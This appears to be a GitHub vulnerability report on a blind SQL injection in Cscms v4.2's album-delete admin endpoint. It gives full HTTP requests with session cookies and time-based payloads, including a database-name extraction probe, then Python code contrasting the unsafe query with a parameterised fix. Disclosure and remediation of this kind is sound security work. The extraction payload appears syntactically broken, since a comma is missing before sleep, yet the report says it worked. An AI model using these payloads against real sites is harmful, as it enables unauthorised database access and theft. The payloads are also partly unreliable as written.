
SQL injection vulnerability exists in Cscms music portal system v4.2(dance_Topic.php_del) #14

Open
@Am1azi3ng

Description


There is a blind SQL injection vulnerability in dance_Topic.php_del.

Details

After logging in as administrator, first add a song album:

POST /admin.php/dance/admin/topic/save HTTP/1.1
Host: cscms.test
Content-Length: 240
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/topic/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
Connection: close

cid=0&tid=0&yid=0&color=&addtime=ok&name=1&pic=&tags=&fxgs=&yuyan=%E5%9B%BD%E8%AF%AD&diqu=%E5%A4%A7%E9%99%86&year=2022&user=&singer=&skins=topic-show.html&hits=0&yhits=0&zhits=0&rhits=0&shits=0&neir=&file=&title=&keywords=&description=&id=0

When deleting the song album, a malicious SQL statement can be injected through the request, achieving SQL injection:

POST /admin.php/dance/admin/topic/del HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
Connection: close

id=3)and(sleep(5))--+

The payload executes and the server sleeps for 5 seconds.

Construct a payload that checks the first letter of the database name:

POST /admin.php/dance/admin/topic/del HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
Connection: close

id=3)and(if(substr((select+database()),1,1)='c'sleep(5))--+

Because the first letter of the backend database name is "c", the server sleeps for 5 seconds.

Vulnerability source code

Closing off the `id` value lets additional SQL be appended to the query, which is why blind injection is possible.
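Added example (not the project's code; the table name, schema and function names are assumed) showing the unsafe concatenation pattern the report describes beside a hardened delete handler that validates `id` as a list of integers and binds it as a query parameter:

```python
import sqlite3

# Constructed in-memory table standing in for the album (topic) table; not the project's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE topic (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO topic VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    conn.commit()
    return conn

def build_vulnerable_sql(raw_id):
    """The unsafe pattern the report describes (assumed shape): the raw `id`
    value is pasted inside parentheses, so a value ending in ')' closes the
    bracket and whatever follows becomes part of the WHERE clause."""
    return f"DELETE FROM topic WHERE (id IN ({raw_id}))"

def parse_id_list(raw_id):
    """Accept only a comma-separated list of non-negative integers; anything
    else (quotes, brackets, comment markers, function calls) is rejected
    before it can reach the query."""
    parts = [p.strip() for p in raw_id.split(",")]
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError("id must be a comma-separated list of integers")
    return [int(p) for p in parts]

def delete_topics(conn, raw_id):
    """Hardened delete: validated integers are bound as query parameters, so
    the database never sees attacker-controlled SQL. Returns rows deleted."""
    ids = parse_id_list(raw_id)
    placeholders = ",".join("?" * len(ids))
    cur = conn.execute(f"DELETE FROM topic WHERE id IN ({placeholders})", ids)
    conn.commit()
    return cur.rowcount

def count_topics(conn):
    return conn.execute("SELECT COUNT(*) FROM topic").fetchone()[0]

if __name__ == "__main__":
    payload = "3)and(sleep(5))-- "  # the report's first payload, URL-decoded
    print("unsafe query would be:", build_vulnerable_sql(payload))
    db = make_db()
    try:
        delete_topics(db, payload)
    except ValueError as e:
        print("hardened handler rejected it:", e)
    print("deleted", delete_topics(db, "3"), "row(s);", count_topics(db), "left")
```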
